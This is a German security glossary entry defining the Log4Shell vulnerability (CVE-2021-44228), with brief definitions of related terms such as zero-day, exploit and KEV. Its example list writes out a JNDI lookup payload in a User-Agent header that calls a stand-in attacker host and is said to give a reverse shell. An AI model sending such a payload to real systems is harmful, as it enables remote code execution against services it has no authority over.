Schwachstellen
Log4Shell (CVE-2021-44228)
Auch bekannt als: CVE-2021-44228, Log4j-Schwachstelle
Definition
Kritische Remote-Code-Execution-Schwachstelle in Apache Log4j 2 von Dezember 2021, die durch Loggen einer einzigen JNDI-Lookup-Zeichenfolge auslösbar war.
Beispiele
- Versand von User-Agent: ${jndi:ldap://attacker.com/x} an eine Java-Webanwendung — Reverse Shell.
- Ausnutzen eines internen Java-Dienstes durch das Loggen eines bösartigen Username-Feldes.
Verwandte Begriffe
CVE (Common Vulnerabilities and Exposures)
Öffentlicher Katalog, der jeder offengelegten Software- oder Hardware-Schwachstelle einen eindeutigen Bezeichner zuweist, um sie branchenweit eindeutig zu referenzieren.
Zero-Day-Schwachstelle
Eine Sicherheitslücke, die dem Hersteller zum Zeitpunkt ihrer Entdeckung oder Ausnutzung unbekannt ist oder für die noch kein Patch existiert.
Unsichere Deserialisierung
Schwachstelle, bei der eine Anwendung nicht vertrauenswürdige Daten deserialisiert und Angreifer beliebige Objekte erzeugen — häufig mit Remote-Code-Execution.
Supply-Chain-Angriff
Angriff, der einen vertrauenswürdigen Software-, Hardware- oder Dienstleister kompromittiert, um dessen nachgelagerte Kunden zu erreichen.
Exploit
Code, Daten oder Technik, die eine Schwachstelle ausnutzt, um unbeabsichtigtes Verhalten wie Codeausführung, Privilegieneskalation oder Informationsabfluss zu erzwingen.
Aktiv ausgenutzte Schwachstelle (KEV)
Eine CVE, die die US-CISA als aktiv ausgenutzt bestätigt und in ihren öffentlichen KEV-Katalog aufnimmt, wodurch Behandlungsfristen für US-Bundesbehörden ausgelöst werden.